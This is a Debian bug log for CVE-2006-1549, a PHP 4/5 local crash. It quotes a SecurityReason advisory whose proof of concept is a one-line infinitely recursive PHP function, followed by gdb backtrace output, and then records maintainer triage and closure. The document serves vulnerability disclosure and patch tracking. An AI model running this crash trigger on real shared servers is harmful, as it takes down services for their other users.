Debian Bug report logs -
#361854
[CVE-2006-1549] PHP allows local users to cause a crash by defining and executing a recursive function.
Reported by: Oliver Paulus <oliver@code-project.org>
Date: Mon, 10 Apr 2006 19:33:08 UTC
Severity: important
Tags: security
Found in versions php4/4:4.3.10-16, 4:4.4.2-1.1
Done: sean finney <seanius@seanius.net>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.
(full text, mbox, link).
Acknowledgement sent to Oliver Paulus <oliver@code-project.org>:
New Bug report received and forwarded. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: php4
Version: 4:4.3.10-16
Severity: grave
for more informaton see:
http://securityreason.com/achievement_securityalert/35
--
Oliver Paulus
OpenPGP
Key id: 28D9C44F
Fingerprint: EADA 62FC 07DC 3361 A3D6 4174 2DE3 C027 28D9 C44F
Public Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x28D9C44F
[Message part 2 (application/pgp-signature, inline)]
Tags added: security
Request was from Filipus Klutiero <ido@vif.com>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.
(full text, mbox, link).
Acknowledgement sent to Ondrej Sury <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #12 received at 361854@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[function *() php/apache Crash PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and
Perl with a couple of unique PHP-specific features thrown in. The goal
of the language is to
allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference
Material is freely available.
- --- 1. function *() Crash ---
PHP4/5 is vulnerability to a local denial-of-service. General problem is
in allocated data to
memory.
for example attack:
cxib# php -r 'function cx(){ cx(); } cx();'
Segmentation fault (core dumped)
cxib#
Segfault.. let`s see what we have in gdb
- ---
cxib# cat /www/functionsegfault.php
<?
function cx(){
cx();
}
cx();
?>
cxib# gdb -q php
(gdb) r '/www/functionsegfault.php'
Starting program: /usr/local/bin/php '/www/functionsegfault.php'
Program received signal SIGSEGV, Segmentation fault.
0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260,
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such
file or
directory.
in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c
(gdb) bt
#0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260,
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
#1 0x080f042a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568
#2 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#3 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#4 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#5 0x080f019a in execute (op_array=0x81b3880)
...
- ---
or in apache error_log
[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal
instruction (4)
- --- 2. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 3. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7
lNzhZke21IHXM0TvvjntXyY=
=Y7Ft
-----END PGP SIGNATURE-----
--
Ondrej Sury <ondrej@sury.org>
[signature.asc (application/pgp-signature, inline)]
Tags added: security
Request was from Ondrej Sury <ondrej@sury.org>
to control@bugs.debian.org.
(full text, mbox, link).
Severity set to `important'.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Reply sent to Steve Langasek <vorlon@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Oliver Paulus <oliver@code-project.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #23 received at 361854-done@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Version: 4:4.4.2-1
severity 361854 important
severity 361855 important
severity 361856 important
thanks
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/34
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/35
On Mon, Apr 10, 2006 at 11:16:11PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/36
On Mon, Apr 10, 2006 at 11:17:52PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/37
It is my understanding that all of these bugs are fixed in the etch version
of php4; I'm accordingly marking them as closed.
In addition, except for the cross-site scripting bug, none of these appear
to warrant severity: grave.
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
[signature.asc (application/pgp-signature, inline)]
Bug marked as found in version 4:4.4.2-1.
Request was from Filipus Klutiero <ido@vif.com>
to control@bugs.debian.org.
(full text, mbox, link).
Bug marked as not found in version 4:4.4.2-1.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug marked as fixed in version 4:4.4.2-1, send any further explanations to Oliver Paulus <oliver@code-project.org>
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug reopened, originator not changed.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Changed Bug title.
Request was from "Michal Pokrywka" <mpokrywka@hoga.pl>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.
(full text, mbox, link).
Acknowledgement sent to Stefan Fritsch <sf@sfritsch.de>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #38 received at 361854@bugs.debian.org (full text, mbox, reply):
found 361856 4:4.4.2-1.1
found 361854 4:4.4.2-1.1
thanks
see
http://secunia.com/advisories/19599/
for #361856
http://www.frsirt.com/english/advisories/2006/1290
for #361854
Bug marked as found in version 4:4.4.2-1.1.
Request was from Stefan Fritsch <sf@sfritsch.de>
to control@bugs.debian.org.
(full text, mbox, link).
Bug closed, send any further explanations to Oliver Paulus <oliver@code-project.org>
Request was from sean finney <seanius@seanius.net>
to control@bugs.debian.org.
(full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 18 Jun 2007 08:46:13 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 14:04:28 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon